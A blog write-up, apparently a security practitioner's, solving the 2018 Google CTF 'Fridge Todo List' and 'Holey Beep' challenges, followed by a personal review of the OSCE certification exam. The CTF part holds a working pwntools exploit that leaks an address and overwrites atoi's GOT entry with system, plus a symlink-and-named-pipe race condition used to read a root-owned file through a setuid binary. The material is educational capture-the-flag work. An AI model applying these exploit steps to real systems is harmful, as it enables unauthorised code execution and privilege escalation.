leak = (struct.unpack("<Q", leak[:8])[0]) - 0x916
print "Leaked Address: %x" % leak

# leak now holds the base address, so system is found by adding its offset
system = leak + 0x940

We now need to find an address in the GOT that we want to replace. In this case I want to replace atoi: read_int calls atoi on the line we type at every prompt, so once its GOT entry points to system, our input string is handed to system instead.

Looking at the location of atoi in the GOT, we see that it sits right after the open entry. The open entry is at offset 0x203080, which is index -4 in the table of offsets we calculated in Python, so we need to write 8 bytes of padding over open before we reach atoi.

Once we know that, let’s update our exploit code to leak the address we need, write over the open entry, and overwrite atoi with the system address.

This will allow us to enter anything we want in the application which should then be executed by system.
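
The payload itself is just padding followed by a packed pointer. The sketch below builds it in Python 3 and checks two constraints that follow from read_line: fgets stops at a newline, and at most TODO_LENGTH - 1 bytes are read. The placement of atoi eight bytes after open is inferred from the description above, and build_payload is a hypothetical helper.

```python
import struct

TODO_LENGTH = 48

def build_payload(system_addr, padding=8):
    """Padding over the open entry, then the new pointer for atoi."""
    payload = b"A" * padding + struct.pack("<Q", system_addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; fgets would stop early")
    if len(payload) > TODO_LENGTH - 1:
        raise ValueError("payload does not fit in one TODO slot")
    return payload

if __name__ == "__main__":
    # base 0x560f722a7000 plus the 0x940 offset of system
    print(build_payload(0x560f722a7940).hex())
```

Rejecting payloads that contain a newline is a design choice for the sketch: under ASLR an address byte can occasionally be 0x0a, in which case it is simpler to reconnect and try again.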

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

leak = (struct.unpack("<Q", leak[:8])[0]) - 0x916
print "Leaked Address: %x" % leak

system = leak + 0x940

s.send("3\n")
s.send("-4\n")
s.send("AAAAAAAA" + struct.pack("<Q", system) + "\n")
s.interactive()

Once we have the exploit updated, let’s execute it and see if it works.

root@kali:~/Google-CTF/Fridge Todo List# python exploit.py 
[+] Opening connection to fridge-todo-list.ctfcompetition.com on port 1337: Done
Leaked Address: 560f722a7000
[*] Switching to interactive mode

Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 
In which slot would you like to store the new entry? What's your TODO? 
Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> $ ls -la
total 52
drwxr-xr-x 3 user   user     4096 Oct 24 19:04 .
drwxr-xr-x 4 nobody nogroup  4096 Oct 24 19:04 ..
-rw-r--r-- 1 user   user      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user     3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user      655 May 16  2017 .profile
-r-sr-xr-x 1 admin  user     9000 Sep 26 15:44 holey_beep
-r-xr-xr-x 1 user   nogroup 18224 Sep 26 15:44 todo
drwxrwxrwt 2 user   user       80 Mar  1 00:49 todos

Awesome, it works! So instead of converting our input to an integer, we get system to execute our commands!

Let’s find the flag!

> $ ls -la todos
total 12
drwxrwxrwt 2 user user   80 Mar  1 00:51 .
drwxr-xr-x 3 user user 4096 Oct 24 19:04 ..
-rw-r--r-- 1 user user 6144 Mar  1 00:51 CountZero
-rw------- 1 user user    0 Mar  1 00:51 admin
> $ cat todos/CountZero
Watch Hackers (again)Figure out why the fridge keeps beepingcheck check /home/user/holey_beepdebug the fridge - toilet connectivityfollow sec advice: CTF{goo.gl/cjHknW}/4513753

And there we have it folks, the flag!

FLAG: CTF{goo.gl/cjHknW}

Holey Beep

Upon reading the challenge description we learn that, using the previous exploit, we can see the secret cake recipe file in the root directory of the system. We also learn that the alarm on the fridge keeps sounding all the time, which seems to be a sign of the Holey Beep vulnerability (yes… that’s a real vulnerability!). We need to find a way to get a root shell to read the file.

Alright, knowing that, let’s download the attachment and extract all the files. We should be presented with the following binary.

root@kali:~/Google-CTF/Holy Beep# ls
holey_beep
root@kali:~/Google-CTF/Holy Beep# file holey_beep 
holey_beep: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6fe5703ed40e673f85df5a7332b9ad3d94a17c99, not stripped

If we look back at our previous challenge, once we got code execution we saw that the holey_beep binary was present there as well, owned by admin and with the setuid bit set.

> $ ls -la
total 52
drwxr-xr-x 3 user   user     4096 Oct 24 19:04 .
drwxr-xr-x 4 nobody nogroup  4096 Oct 24 19:04 ..
-rw-r--r-- 1 user   user      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user     3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user      655 May 16  2017 .profile
-r-sr-xr-x 1 admin  user     9000 Sep 26 15:44 holey_beep
-r-xr-xr-x 1 user   nogroup 18224 Sep 26 15:44 todo
drwxrwxrwt 2 user   user       80 Mar  1 00:49 todos

Fortunately for us, this challenge gave us a big hint by referencing the Holey Beep vulnerability, which allowed for privilege escalation via a race condition in the beep binary. There’s a very good blog post called “HoleyBeep: Explanations and exploit” that details the vulnerability and exploitation process, which I highly suggest you read.

But before we go off track, let’s open the binary in IDA and see what the binary really does.

So as detailed in the image, the application installs a handler for signal 15 (0x0F in hex), which is SIGTERM, via the signal function. The application then checks whether we passed at least one argument (argc greater than 1). If we didn’t, it prints out a usage message; otherwise it jumps to loc_A21, which seems to be setting up a for loop.

The C code for this part of the application will look like the following:

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < ?; ++i)
	{
	}
	return 0;
}

Let’s look deeper into the application to see what else is going on.

So it seems the for loop iterates over our arguments, and for each argument it sets a variable called device by attempting to open dev/console via the open function. This looks like a bug: the path is relative, when it was surely supposed to be /dev/console.

After that it checks whether the device file descriptor is less than 0, and if it is, it prints an error and exits.

So knowing that, the updated C code for this should look like so.

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < argc; ++i)
	{
		device = open("dev/console", 0, v1);
		if ((signed int)device < 0)
			err(1, "open(\"dev/console\", O_RDONLY)");
	}
	return 0;
}

Let’s continue exploring the application.

Here we see that after the open function is called and is successful, atoi is called on the current argument (argv[i]) and the result is stored in a new variable.

It then checks whether the ioctl (input-output control) call returns less than 0, and if so it prints an error via fprintf. Either way, it then closes the device via the close function.

So the full C code for this application should be as follows.

int __cdecl main(int argc, const char **argv, const char **envp)
{
	const char **v1;
	v1 = argv;
	if (signal(15, handle_sigterm) == (__sighandler_t)-1LL)
		err(1, "signal", argv);
	if (argc <= 1)
		errx(1, "usage: holey_beep period1 [period2] [period3] [...]", argv);
	for (i = 1; i < argc; ++i)
	{
		device = open("dev/console", 0, v1);
		if ((signed int)device < 0)
			err(1, "open(\"dev/console\", O_RDONLY)");
		v2 = atoi(v1[i]);
		if (ioctl(device, 0x4B2FuLL, v2) < 0)
			fprintf(stderr, "ioctl(%d, KIOCSOUND, %d) failed.", (unsigned int)device, v2);
		close(device);
	}
	return 0;
}

Alright, so we got most of the code, but we are still missing part of it. We still don’t know what the handle_sigterm function is doing. So let’s dig into that by double clicking it.

So we can see that this function checks whether device is greater than or equal to 0, and whether the ioctl call on the device returns less than 0. If so, it reads up to 1023 bytes (0x3FF in hex) from the device into a buffer via the read function and prints that buffer as debug data.

The code for this function can be seen as such.

void __noreturn handle_sigterm()
{
	char buf[0x400];	/* the decompiler shows a single char, but 0x400 bytes are cleared below */
	if ((signed int)device >= 0 && ioctl(device, 0x4B2FuLL, 0LL) < 0 )
	{
		fprintf(stderr, "ioctl(%d, KIOCSOUND, 0) failed.", (unsigned int)device);
		memset(buf, 0, 0x400uLL);
		read(device, buf, 0x3FFuLL);
		fprintf(stderr, "debug_data: \"%s\"", buf);
	}
	exit(0);
}

Awesome, so we know how this whole application functions! We also know that there is a bug in the open call: it opens the relative path dev/console. This means we can create a file such as /tmp/dev/console and launch the binary from /tmp, and it will open the console file from our directory. This console file can then be a symbolic link to our flag!
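
The relative path trick can be tried out safely in a scratch directory. The sketch below is an analogy in Python rather than the binary itself: it creates a stand-in secret file, a dev/console symlink pointing at it, and then opens "dev/console" relative to the current working directory. All file names other than dev/console are made up, and it does not model the setuid part of the attack.

```python
import os
import tempfile

def open_relative_console(workdir):
    """Open "dev/console" the way the binary does: relative to the cwd."""
    old_cwd = os.getcwd()
    os.chdir(workdir)
    try:
        with open("dev/console", "rb") as handle:
            return handle.read()
    finally:
        os.chdir(old_cwd)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")   # stand-in for the real target
        with open(secret, "wb") as handle:
            handle.write(b"stand-in secret\n")
        os.mkdir(os.path.join(tmp, "dev"))
        os.symlink(secret, os.path.join(tmp, "dev", "console"))
        return open_relative_console(tmp)

if __name__ == "__main__":
    print(demo())
```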

Once that’s done we then need to somehow figure out a way to send a SIGTERM signal (kill -15) while the file is open, so that the handler actually reads the flag and outputs the contents.

To deliver this signal at the right moment we can exploit a race condition in the application. Since the application loops over its arguments via for (i = 1; i < argc; ++i), we can pass many arguments to keep the loop running longer, and then attempt to send the kill signal.

For this race condition we can use the seq command to generate a lot of arguments, from 1 to, oh I don’t know, 5000. We can also make the loop way slower by abusing the fprintf function.

Notice how the fprintf function only outputs to stderr. So what we can do is redirect standard error to a named pipe created with mkfifo. As soon as the kernel buffer for that pipe fills up, the write will block and the process will freeze until the pipe is read from the other side. Since the blocked fprintf sits between open and close, the device stays open while the process is frozen, and as long as we don’t read from the other side we have all the time we need to send the kill signal.
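
The "pipe fills up and the writer stalls" behaviour is easy to observe in isolation. This sketch uses an anonymous pipe from os.pipe instead of a mkfifo pipe, and switches the write end to non-blocking mode so that the demo terminates with an exception at the point where a normal blocking writer (like fprintf in holey_beep) would freeze. The function name and chunk size are arbitrary.

```python
import os

def fill_pipe(chunk=b"x" * 4096):
    """Write to a pipe nobody reads until the kernel buffer is full."""
    read_fd, write_fd = os.pipe()
    os.set_blocking(write_fd, False)   # raise instead of hanging when full
    written = 0
    try:
        while True:
            written += os.write(write_fd, chunk)
    except BlockingIOError:
        pass                           # a blocking writer would freeze here
    finally:
        os.close(read_fd)
        os.close(write_fd)
    return written

if __name__ == "__main__":
    print("pipe accepted", fill_pipe(), "bytes before it would block")
```

The exact capacity depends on the system (64 KiB is a common default on Linux), which is why the loop needs enough failing ioctl calls to produce that much error output.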

So with that knowledge, let’s use our previous exploit to get a shell, and navigate to the /tmp folder.

> $ sh
$ cd /tmp

From there let’s make a new directory called dev. Once the folder is created, let’s make a symbolic link at /tmp/dev/console pointing to the secret_cake_recipe file, since remember, we want to abuse the hard-coded dev/console path.

Then let’s make a new named pipe called fake in the /tmp folder, which will be used for our race condition.

$ mkdir dev
$ ln -s /secret_cake_recipe /tmp/dev/console
$ mkfifo /tmp/fake
$ ls -la
total 4
drwxrwxrwt  3 user user   80 Mar  1 01:12 .
drwxr-xr-x 22 user user 4096 Oct 24 19:10 ..
drwxr-xr-x  2 user user   60 Mar  1 01:12 dev
prw-r--r--  1 user user    0 Mar  1 01:12 fake
$ ls -la dev
total 0
drwxr-xr-x 2 user user 60 Mar  1 01:12 .
drwxrwxrwt 3 user user 80 Mar  1 01:12 ..
lrwxrwxrwx 1 user user 19 Mar  1 01:12 console -> /secret_cake_recipe

Once we have all that set up, we can now exploit the race condition.

We will start by calling the holey_beep binary, provide it a lot of arguments via the seq command, redirect standard error to our named pipe, and finally run all of that in the background via the & operator, since we need to look up the binary’s pid so we can send our signal.

$ /home/user/holey_beep $(seq 1 1 5000) 2> /tmp/fake &

Once that’s called, we will then want to run a sleep command that waits some time and, once that time is over, reads from the named pipe via cat.

The reason we do this is because our flag will be somewhere in that output, since handle_sigterm writes the debug data to standard error as well. Once we send the kill signal, the handler should read the flag through the symbolic link and write it to our named pipe, which is then printed out on our side.

We will run this sleep command in the background as well so we can get the pid of the holey_beep process. To do that we will use the pgrep command.

Alright, with that let’s go ahead and execute the following sleep command, get the process id of the binary, and then send the kill signal.

$ ( sleep 30; cat - ) < /tmp/fake &
$ pgrep holey_beep
13
$ kill -15 13

Once completed, wait for the sleep to run out and you should then get output on your screen from the named pipe.

---trim---
4, KIOCSOUND, 2016) failed.ioctl(4, KIOCSOUND, 2017) failed.ioctl(4, KIOCSOUND, 2018) failed.ioctl(4, KIOCSOUND, 0) failed.debug_data: "== Secret recipe for the CTF{the_cake_wasnt_a_lie} cake ==

The Pittsburgh Engineer’s Cake (This is the maximum of the final Gaussian Process model, trained
on all the Pittsburgh Trials, including transfer learning.)

    Mix together flour, baking soda, and cayenne pepper. Then, mix the sugar, egg, butter (near refrigerator
temperature), and other ingredients until nearly smooth; it takes about 2 minutes in a counter-top stand mixer
with a flat paddle blade. Add the dry ingredients and mix just until the dough is uniform; do not over-mix. Spoon
out onto parchment paper (we used a #40 scoop, 24 milliliters), and bake for 14 minutes at 175C (350◦
F).

• 167 grams of all-purpose flour.
• 186 grams of dark chocolate chips.
• 1/2 tsp. baking soda.
• 1/4 tsp. salt.
• 1/4 tsp. cayenne pepper.
• 262 grams of sugar (75% medium brown, 25% white).
• 30 grams of egg.
• 132 grams of butter.
• 3/8 tsp. orange extract.
• 1/2 tsp. vanilla extract.

https://research.google.com/pubs/archive/46507.pdf

And just like that, we exploited the race condition and got our flag!

FLAG: CTF{the_cake_wasnt_a_lie}

Closing

And there we have it ladies and gentlemen, we completed the 2018 Google CTF: Beginners Quest!

I’ve got to say that the final PWN challenges were actually very challenging, even for me! It just really goes to show you how many crazy vulnerabilities are out there in the wild and what it takes to find and exploit them.

This CTF was a great learning experience and I hope that it allowed you all to learn something new as well.

With that, I close this series of posts!

Thanks for reading!

Offensive Security’s CTP & OSCE Review

22 August 2019 at 00:00

On August 22, 2019 I received yet another one of the most desired emails by aspiring Offensive Security enthusiasts and professionals…

Dear Jack,

We are happy to inform you that you have successfully completed the Cracking the Perimeter certification exam and have obtained your Offensive Security Certified Expert (OSCE) certification.

It was finally over! I accomplished what I believed to be, as of yet, the hardest certification exam I have attempted! After a grueling year of training after my OSCP, followed by a month in the lab, and two 48 hour exam retakes, it all paid off at the end - I was finally an OSCE!

Now when people told me that the OSCE was a monster all on its own, I really didn’t believe them. Well, that was until I failed my first exam attempt and got a taste for myself. Failing the exam led me to explore new techniques and tactics, and took me down a pretty interesting rabbit hole that actually taught me a great deal of new things!

So as I write this post, I want to share my thoughts, experiences, and some tips for those who are aiming to achieve the OSCE. Because trust me when I say… you’ll need them!

Background & Experience

Before I delve into the CTP Course and the OSCE, I want to provide you with some information on my background and experience. At the time of writing this post I have been in the InfoSec industry for ~5 years. I completed my OSCP back in 2017 and detailed my previous background and experience in my Offensive Security’s PWK & OSCP Review blog post. Since then I have learned a great deal of new things, and at the time of writing I work as a Security Consultant and Red Team Operator at NCC Group.

Much of the learning I did to prepare for the OSCE was done outside of work by reading books, practicing in HackTheBox, and competing in CTFs such as the 2018 Google CTF. A big reason I pursued the OSCE was not to learn exploit development but to gain new skills that would make me a better red teamer: being able to develop new tools, bypass anti-virus and EDR, and even learn how to fuzz and build more complex exploits if the need were to arise.

Now, do you need to have the same experience to pass the OSCE? Absolutely not! I firmly believe that if you passed your OSCP and took the time to learn more about web application vulnerabilities, x86 assembly, and some Windows internals, then you would be more than ready to attempt this course! I will delve a bit deeper into the specific studies you need to succeed a little later on, but for now, let’s get into the meat of the review!

The CTP Course & Lab

Unlike the OSCP, the OSCE doesn’t have a dedicated practice lab. In fact, the CTP course and lab are tied together, making it more of a walkthrough and “follow along” than a self-taught course, which is then followed by the OSCE exam. You have the option to register for either 30 or 60 days of lab time. Once registered, on your assigned course start date you’ll be provided access to download all your course materials. The materials include the ~4-hour Offensive Security CTP course videos, the 145-page CTP PDF course, and your VPN lab access.

When I started my OSCE journey I opted for 30 days as I thought that this would be a decent amount of time to cover the material, and spend some time practicing and honing the techniques taught to me. I don’t recommend opting in for 60 days as I believe that you won’t get much benefit from the additional days due to the fact that you can pretty much cover the whole course and more in the 30 day time span.

Just as with the OSCP, it’s recommended that you go through both the PDF and the videos, as the videos sometimes have more details than the PDF. The course teaches some more advanced penetration testing skills and covers topics such as:

  • Web Application Attacks (XSS/LFI to RCE)
  • Backdooring PE Files
  • Bypassing Antivirus Systems
  • Bypassing ASLR on Windows Vista
  • Crafting and Using Egghunters
  • Fuzzing & 0Day Development
  • Encoding Shellcode & Bypassing Restrictions
  • Attacking Network Infrastructure

It took me about 2 weeks to get through all the materials in the course, not because it was long, but because some of the material and exercises were quite hard - and you really needed to put in some effort to make things work. Even though some of the material was hard, the learning experience was phenomenal. Fact, much of the material is a tad bit outdated - ranging back to the XP and Vista days - but even so the course did an excellent job on teaching you the basics of the exploit development life cycle and its associated techniques.

Now, I must give you a stern warning - just like the PWK course, the CTP will not and does not provide you with everything you need to know, but it does hint you on what you need to learn to pass the exam. So I highly suggest to spend time doing additional research and practice after the course.

Since the course and lab are tied together - I will briefly go over what you can expect. The lab itself only has a total of 4 virtual machines that contain all the tools and software you need to practice and complete the exercises. Now thankfully, unlike the OSCP, you don’t have to write up a report for the exercises! =)

Within these four machines you’ll practice the different topics stated above, and will be asked to mix and match what you have learned so far to create more complex exploits - such as bypassing a different antivirus, or using a 3-byte overwrite to execute your egg hunter. The exercises are pretty easy to follow, but make no mistake, the devil is in the details, and if you don’t pay attention or spend time doing additional research on the topics, you’ll have a hard time understanding everything.

After my 30 days were up, I decided to do some more practice before scheduling my exam. I went to exploit-db and looked for simple vulnerabilities in applications that I could practice on. After 2 more weeks of practice and reading blogs, I decided to attempt my OSCE exam and locked in the time for May 26th at 12PM.

The OSCE Exam - Attempt #1

If you thought the OSCP was hard, then you’re in for a surprise. This soul crushing, gut wrenching, 48-hour exam is in all honesty the hardest I ever attempted - and by god did I love it. This exam really makes you demonstrate creative problem solving and your ability to think laterally while performing effectively under pressure to execute attacks in a controlled and focused manner.

For the exam, you are allocated 4 machines, and are allowed RDP/VNC access to 2 of them to build and debug your exploits for 3 of the 4 objectives. As with the OSCP, each machine has certain objectives that you need to complete in order for your points to count. Along with that, automated tools like Burp Pro, Metasploit AutoPwn, etc. are restricted, but you can still use Metasploit. In order to pass you need to score 75/90 points. I highly suggest you read the OSCE Exam Guide for more details on what is and isn’t allowed during the exam.

01 x 12PM: Doesn’t Seem Hard!

Finally, May 26th came around. With some early morning breakfast in me and a coffee in my hand, I was sitting at my computer listening to some Monstercat when I received my exam information and VPN access from OffSec. “Let’s do this!” I thought to myself as I read the instructions, noted the objectives and began working on the first “easy” objective.

01 x 3PM: I Fu**ed Up:

Approximately 3 hours after my initial start time I came to realize something… and that something was that I messed up, badly. I misread the objective and went down a complete rabbit hole that didn’t work. I only came to realize my error when I went back and slowly re-read the objective. I was fuming! I wasted three hours of my time to not only realize that I was doing it wrong, but that the solution for the challenge was going to be much more complex than originally thought. I knew what I had to do, but it was going to be time consuming… oh well.

01 x 5PM: It’s not working…

After catching my mistake, I took a quick 5 minute breather, got something to drink and off I went working on my exploit. Two hours later I crafted my initial exploit and had it working on a local test machine I set up for myself - but for some reason the exploit would not work on the debugging machine! Why?! After a few more trial and error tests I decided to leave this objective for later and moved onto the next one.

01 x 7PM: You’re kidding me, right?

After wasting a lot of time on the first objective I decided to move onto the next “easy” objective. I was 7 hours into the exam and still hadn’t gotten a single point, but I told myself not to give up - I still had 41 hours left. I began working on my second objective using techniques that I learned from the course and from some blogs that I read. Everything was working as intended and doing what it was supposed to… but the final result was unsuccessful.

“You’re kidding me, right?!” I yelled, as I knew that this technique had to work, but something was just not right! I found myself trying new techniques, googling, rebuilding my shellcode, googling some more, and updating my shellcode again, but even that wasn’t enough. I couldn’t finish the objective. Feeling down, I decided to come back to this later as well and moved onto the third objective.

01 x 8:30PM: Okay, I got this… Guess not.

At this point I opted to take a small break and eat some dinner to relax. I was in a bad spot. 9 hours in and I wasn’t making progress but I had hope that I could still pass! After my short break I sat down at my computer, took a deep breath, and off I went attempting the third objective. Within an hour I made some progress, found the vulnerability, and was able to somewhat exploit it but not fully.

For the next 4 hours, I was at a roadblock. I knew how to exploit the vulnerability to get a shell, but I couldn’t for the life of me find the exact location needed. I spent hours googling, researching, and testing techniques but nothing worked. At this point I found myself bouncing back and forth between the three challenges and decided that I need to sleep… I was exhausted!

02 x 1AM: Down but not out!

It was late. After 13 hours into the exam, and zero points under my belt I felt defeated. This exam was harder than I thought and at this point I started to come to terms with the fact that I might fail. Even though I got no points, I made some progress and the exam was not yet over! I still had a fighting chance! With that mindset I went to bed hoping that the next day would be better.

02 x 10AM: Well did you RTFM!?

Day 2 arrived! With the sun shining through my window I woke up at 9AM, ate some breakfast, made some coffee and off I went to work on the exam. I focused my efforts on the first objective again and slowly re-read the objectives to make sure I wasn’t doing anything wrong.

Oh… Oops! After re-reading the objectives again I noticed that I missed a critical piece of “additional” information. But surely that wasn’t it, right? Oh boy was I wrong! I followed the additional information and within 50 minutes I got a working exploit! I jumped up and screamed for joy! I couldn’t believe I failed to see this in the first place, boy did I feel stupid.

Oh well, with that successful exploit I attained 15 points! I felt ecstatic, filled with new energy I believed that I now had a fighting chance!

02 x 6PM: Two wrongs make a right, I guess…

After getting the first objective, I spent the next six hours jumping between the third and fourth objectives - some fuzzing here, some googling there, some CTP course magic here, the wrong google search here… wait what? Wrong google search? “This isn’t what I wanted! Oh, hey, wait a second…” I thought to myself as I came across a forum post while doing research for how to exploit the third objective. The post wasn’t really what I was looking for, but lo and behold it actually was! Using my new found information and after some trial and error, I was able to obtain my second shell, bringing me up to 30 points!

Yes! I celebrated with a victory lap around the house and thought that maybe I can still pass!

02 x 9PM: Hello Access Violation!

During the time I was working on the third objective, I was fuzzing the fourth objective - but had no success. Being a little tired and hungry, I decided to write a script that would automate the fuzzing for me. With the script completed, I kicked it off and stepped away for an hour to eat and rest. Once my break was over I got back and was greeted by the holy grail of exploit development - “Access Violation”.

I was thrilled! Within 15 minutes I was able to jump into my controlled buffer. I then set off to build a simple python proof of concept to use as my skeleton exploit. Now came the hard part, crafting a working exploit that would bestow me with a shell!

03 x 6AM: That’s impossible!

9 hours went by since I got control of my malicious buffer… 9 hours of hard work, testing shellcode and applying new techniques, but all of that was for nothing. Nothing seemed to work, this objective was literally impossible! There was one major road block that was killing me, the same thing that usually kills all exploit development, and it was right there staring me in the face with its evil little grin.

I didn’t know what to do.

03 x 9AM: Defeated!

I was exhausted and only had 3 hours left before the exam was over. With only 30 points under my belt, an unfinished challenge, and an impossible exploit - I knew this was over, I won’t pass. I choked up a little, and made up my mind to call it quits. I was defeated, it was over, my dream of becoming an OSCE… shattered.

I sulked my way over to my bed and fell asleep.

Intermission - Back to the Basics

I was quite miserable after failing the exam, it was way harder than previously thought. At first I blamed OffSec for not teaching the required techniques needed to pass, but after talking to some friends, reading the forums, and going through the course again I came to realize something. OffSec did prepare me for the exam, everything that I needed to know and learn more in depth was provided in the course - maybe not directly stated, but it was there.

Here’s the beautiful thing about Offensive Security: they first hold your hand through the course and teach you the techniques needed to understand the basics, but after that they throw you into the deep end of the pool to learn on your own. While it might seem a bit brash at first, it really isn’t, because Offensive Security wants to teach you to be creative, think laterally and be detail-oriented. If you pay more attention to the course and exam you’ll notice that the devil is in the details and that OffSec pretty much points you in the right direction or gives you hints for the challenges.

With a new found love for Offensive Security, a fresh mindset and the willingness to learn, I opted to take a 2 week break and returned to my studies shortly after.

I first started by going through the exam objectives again, spending about two hours reading them, taking notes and trying to read in between the lines. Unfortunately for me when I did this I noticed things I missed during the exam - which just goes to show that you really need to pay attention during the course and exam.

After taking notes, I did some OSINT (Open Source Intelligence Gathering) on Offensive Security’s website for the CTP/OSCE and looked at the “What competencies will you gain?” section. A few points stood out to me, such as “understanding of PE structures”, “innovative ways of penetrating internal networks”, as well as the “ability to work through encoding issues and space restrictions”.

Once my notes were completed, I went through the CTP course again and tried to focus on items that I knew would help me on the exam. Afterwards I went online and googled the topics that I noted previously, and to be honest they really helped me understand the course and objectives in depth. This not only paid off in the OSCE exam later but also helped me become a better red teamer as I learned new things such as PE Injections, some new internal network pivoting and attack techniques, and more!

While reading and studying the new found material, I also created a simple Windows XP lab that I used to practice on. I tried to craft the lab to resemble the OSCE exam as closely as possible. This was fantastic for me as I got the opportunity to test techniques, learn the ins and outs of the OllyDbg debugger, and also got to play with shellcoding and the Windows API locally.

My additional study period lasted about two months and I believe that it was greatly beneficial for me. After all that I felt ready to go after my second OSCE attempt, and locked in the date of August 15th, 2019 at 2PM. Once the date was locked in I actually started working and drafting my OSCE report to save me time if I was to pass the next exam retake.

The OSCE Exam - Attempt #2

Finally, August 15th came around. I woke up at 10AM and followed my regular daily routine. The days leading up to my exam I spent away from the computer enjoying a small vacation, so I was relaxed and well rested. I decided to take a short walk outside as the weather was nice to relax and focus on what I had to do. By 1:30PM I was sitting at my computer reading through all my notes and making mental notes of what I needed to focus on.

I had some proof of concepts created from my previous attempt that I fine-tuned throughout my study period. I knew that these proof of concepts were the answers to objectives, all that was left was to implement them properly. Sure enough, at 2PM I got the email from OffSec with my exam information. After setting everything up, I took a deep breath and dived right into the first objective.

01 x 6PM: I’m on fire!

4 hours after my initial start time and I was on fire as I managed to take out 2.5 of the 4 objectives! This put me in a good position with 45 points under my belt. I did have some issues on the first objective such as my math being off and some stack alignment issues, but that was easily solved thanks to all the prep work I did. It was smooth sailing!

The second objective was taken out shortly after the first. Thanks to all the reading that I did, I knew why my previous attempts didn’t work. A shell on the third objective followed directly after. I jumped for joy and did a lap around my house celebrating. Being ecstatic that everything was falling into place, I decided to take my energy and focus on the fourth “impossible” objective.

01 x 8PM: Peekaboo! I see you!

There’s a reason the fourth objective is considered “impossible”, and that’s because it literally forces you to think laterally and like an actual attacker to accomplish the objective. I was able to fuzz and crash the application with my proof of concept, I had control of my malicious buffer - but I still didn’t know how to exploit the vulnerability to get a shell.

So I did the only thing I could, and that was to put my Red Team face on and play the role of a persistent attacker. After an hour of digging I found something very promising and luckily for me this topic was briefly presented in the course! So I built a quick proof of concept and was able to get a remote shell on the debugging machine. I had just found the shell vector… but now the question was, how the heck do I craft this into my exploit?

01 x 11PM: Work dammit!

After finding the exploit vector to obtain a shell for the fourth objective I decided to step away for an hour to eat and relax. I had to figure out a way to execute this exploit remotely, but how? This question stuck with me the whole time while I was eating. It wasn’t until my dad and I were talking about doing some custom work on our kitchen that it struck me… CUSTOM! Yes that’s it! How could I have missed this?! I needed to build custom shellcode to get past the restrictions, it was the only viable option!

By 10PM I was at my computer again doing some googling, and crafting custom shellcode to exploit the vulnerability. I crafted some shellcode on my local XP machine and verified that it worked; I finally found the solution to the objective! So I did the next best thing and tested it on the debugger machine hoping that it would work… but it didn’t. That little evil roadblock was still there, staring back at me with more than just a grin this time. I needed to find a way to optimize the shellcode, but attempt after attempt, I still couldn’t get it to work.

02 x 1AM: Let me sleep on it.

It was getting late. 11 hours into the exam and I knew that I was close to passing, but I kept hitting roadblocks. I was able to do some code optimization but I was still missing a critical piece of information to make the shellcode work properly. I decided to step away for the day and go to sleep. I knew I would pass, so might as well get a good night of sleep… right?

02 x 10AM: Ever heard of backups?

The 2nd day started off very well for me actually. I woke up at 9AM, followed my daily routine, and by 10AM I was at my computer again getting ready to tackle the final challenge! I started up my VM and was greeted by an “Oh no! Something has gone wrong. A problem has occurred and the system can’t recover” message.

My reaction was something along the lines of…

I had to recover my data somehow! This is a VM right? So that means I have a snapshot somewhere, right? Wrong! I never backed up the data on my exam VM… lovely. Fortunately for me I was able to boot the VM into recovery mode and figured out that the error occurred in Xorg. Thankfully that was easily fixed and I was able to log back into my system after an hour. Phew, crisis averted.

Maybe this is a good time to remind you to back up your data or take snapshots of your VMs!

02 x 2PM: Not so fast cowboy!

With the data crisis averted, I got back to work trying hard to optimize my shellcode. I made some good progress, some CTP magic here, some googling here and I was really close! But yet again I was at a roadblock, I was missing something critical. What could it be? I started to lose hope after a few hours and even considered giving up - but I told myself that I will “Try Harder” and continued to push forward.

02 x 6PM: The devil IS in the details…

I was so close to passing that I could taste it! I only needed to tweak my shellcode a little and I would get my exploit to work, but I couldn’t put my finger on what optimization I needed. At this point I decided to take a step back and walked to the kitchen to make some food and tea. As I sat in the kitchen my dad came and asked me how the exam was going, to which I responded with my current status. After listening to me he told me that I was probably over thinking it, and to relax, explaining that I will figure it out.

Overthinking? Impossible! I was thinking laterally… that’s what OffSec wanted, right? Okay, I was in the same situation during my OSCP exam, so I returned back to my computer and decided to start from the basics. After some step by step debugging I noticed something simple that I previously overlooked. At first I didn’t think much of it until I started to think about how I can use this in my shellcode. After some thinking and fiddling around, I made a small adjustment to my shellcode, held my breath, and kicked it off against the server.

Boom… shell! I jumped out of my chair and screamed! I got it, it worked! This shell bestowed me with an additional 30 points, bringing me up to 75 points - enough to pass! I was so hyped but also disappointed with myself that I missed such a simple piece of information. Still I did it, I passed!

Wrapping it Up

With 75 points under my belt I decided to call it quits. I was tired and had a very busy weekend ahead of me, so I decided to finish up my report. I went back to gather all my screenshots, validate the exam requirements, and by 9PM I sent the report to OffSec which was about 98 pages long.

I received a response 5 days later from Offensive Security saying that I passed. It was finally over, I did it, I was an OSCE!

